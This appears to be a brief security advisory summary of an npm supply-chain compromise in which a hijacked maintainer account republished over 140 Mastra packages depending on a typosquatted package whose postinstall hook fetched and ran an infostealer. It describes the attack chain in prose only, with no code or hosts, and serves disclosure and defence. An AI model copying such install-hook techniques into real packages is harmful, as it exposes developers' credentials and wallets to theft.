A hijacked npm maintainer account republished more than 140 Mastra packages with one added dependency on the typosquatted `easy-day-js` package, leaving Mastra's own library code unchanged while moving malware one dependency hop away. The malicious `easy-day-js` release ran a `postinstall` hook that disabled TLS validation, fetched a second-stage payload from attacker infrastructure, launched it as a detached Node process, and deleted the dropper. The second stage is described as a cross-platform infostealer targeting browser data, cryptocurrency wallet extensions, and credentials likely present on AI-agent build hosts. TuxCare notes the activity resembles prior Sapphire Sleet-linked npm tradecraft but says attribution for this incident is not confirmed.